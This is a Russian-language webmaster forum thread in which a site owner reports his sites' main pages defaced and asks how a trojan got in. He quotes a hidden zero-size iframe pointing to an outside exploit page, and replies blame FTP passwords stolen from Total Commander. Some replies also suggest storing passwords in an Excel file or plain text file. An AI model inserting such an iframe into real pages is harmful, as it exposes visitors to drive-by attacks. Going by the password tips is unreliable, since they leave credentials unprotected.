Как найти трояна?

12
[Удален]
3648

Сегодня ночью обнаружил на всех своих сайтах вместо главных страниц то что изображено на скрине ниже, понятно что троян или ещё какаято гадость, но как она проникла и почему остаток ночи я сканировал свой камп KISом (касперыч) который также ничего не обнаружил.

В самом низу страницы с этим проникновенным текстом нашёл такой iframe

<iframe src="http://x-y-zz.org/exp2/index.php" width="0" height="0"></iframe>

В момент, когда я всё это обнаружил, я как раз total commanderom заливал изображения себе на хост, в связи с этим возникает вопрос - безопасно ли хранить пароли так как храню их я. Знаю что в тоталкоммандере пароли сохранять нельзя, но я, как мне кажется хоть и хранил их, но безопасно, т.е. допустим пароль: 123456, а у меня в тотале записан и сохранён: 123456zz, т.е. когда я врубаю тотал и соединяюсь с сервером, я просто вручную убираю в пароле два последних символа и всё, мне это кажется удобным, т.к. не надо вводить пароли постоянно, просто надо знать что во всех моих ftp паролях есть два лишних символа.

Подскажите безопасно ли хранить всё таки пароли, так как храню их я и чем ещё проверить комп, т.к. касперыч ничего не нашёл.

jpg 13104.jpg
D
На сайте с 06.06.2007
Offline
112
#1

троян пришел с этим письмом?

получил такое же пиьмо, естественно что Коммерсант не имеет к нему никакого отношения -- это 100%, а вот то что в нем вирус???? drweb промолчал

[Удален]
#2
dibart:
троян пришел с этим письмом?

получил такое же пиьмо, естественно что Коммерсант не имеет к нему никакого отношения -- это 100%, а вот то что в нем вирус???? drweb промолчал

Это не письмо, это то что загружалось вместо главных страниц моих сайтов.

antono
На сайте с 12.07.2004
Offline
302
#3

Меняйте пароли от FTP, у меня из тотала один раз утащили все пароли и позаражали сайты на всех акаунтах откуда утащили пароли. Правда вы пароли шифровали, но лучше перестраховаться.

Кстати пароли лучше хранить не в тотале, а где нибудь в запароленном экселевском файле так

_ftp://ftplogin:ftppass@site.ru/

Если нужно зайти на хостинг жмете в тотале ctrl+n , и вставляете ту строку.

KBG
На сайте с 24.01.2008
Offline
77
KBG
#4
bankiroff:
чем ещё проверить комп, т.к. касперыч ничего не нашёл.

Попробуйте еще nod 32 если не пробовали, бывает червяка касперский не видит, а нод нормально все находит! (как вариант)

* а вы еще наверное в поисках места для бесплатного размещения пресс-релизов (http://press_reliz.blogspot.ru/)?
sevan
На сайте с 03.03.2006
Offline
139
#5

Онлайн проверки:

http://freedrweb.com/

http://www.kaspersky.ru/virusscanner

Только ведь антивирус может быть эффективным лишь в момент заражения, а потом..😒

вот сюда обязательно сходите:

http://z-oleg.com/

Jefa
На сайте с 01.02.2007
Offline
191
#6

стотыщьмильенов раз перетиралось - не пользуйтесь тоталом, как фтп клиентом.

есть программы, специально для этого предназначенные.

фтп менеджер тоталкомандера, это как электробритва встроенная в утюг, например.

MK
На сайте с 22.06.2007
Offline
28
#7

Год назад стащили пароли (как раз из тотал коммандера, на работе у начальника были забиты) на самом сервере техподдержка ничего не нашла.

Сменила пароли доступа и перезалила index файлы, (больше ничего на сервере злодеи не меняли)

К вопросу о ноде и касперском (вещи спорные по идее хорошо настроенный нод лучше каспера, но год назад было такое ощущение что вирусы пишутся спецально под нод и каспер был на высоте. сейчас на работе каспер дома бесплатный антивирь (пока довольна).

PS: на сайте бывает много дырок, начиная от обычной заявки онлайн:)

- Говорят Бабе-Яге счастье привалило? - Бессовестно врут! О-бенто (http://mirka.su)
UB
На сайте с 22.07.2007
Offline
133
#8

была в прошлом году эпидемия, можете почитать тут

Воспользуйтесь советом Jefa, и убейте тотал коммандер.

Кстати, возможно проблема со стороны хостера (по крайней мере у меня так и было)

[Удален]
#9
UnBroken:
была в прошлом году эпидемия, можете почитать тут
Воспользуйтесь советом Jefa, и убейте тотал коммандер.
Кстати, возможно проблема со стороны хостера (по крайней мере у меня так и было)

В борьбе с вирусами я не новичёк ;), уже не один раз наступал на грабли, но последние полгода было тихо, и как мне казалось я всё предусмотрел для защиты от них.

Вобщем видимо как бы мне не нравилось работать с тотал коммандером, придётся его и правда сносить, т.к. видимо это и есть слабое звено.

Всем спасибо за рекомендации :)

T1
На сайте с 02.02.2007
Offline
31
#10

Пароли всегда храню в отдельном txt

При подключении вставляю копипейстом

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий